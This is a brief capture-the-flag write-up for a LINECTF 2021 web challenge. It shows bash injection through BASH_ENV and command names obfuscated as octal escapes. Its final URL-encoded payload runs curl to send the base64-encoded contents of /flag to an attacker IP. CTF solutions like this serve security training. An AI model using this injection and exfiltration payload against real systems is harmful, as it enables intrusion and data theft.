LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN
We can inject some bash command line using environment BASH_ENV
.
BASH_ENV=touch /tmp
/bin/bash will execute touch.
It's like 34C3 ctf's challenge. We can call cat like $'\143\141\164'
Thus, final payload is
`$%27\143\165\162\154%27%20111.111.111.111:40010/$($%27\143\141\164%27%20$%27\57\146\154\141\147%27%20|%20$%27\142\141\163\145\66\64%27)`
replace 111.111.111.111 to attacker ip.
LINECTF{well..what_do_you_think_about}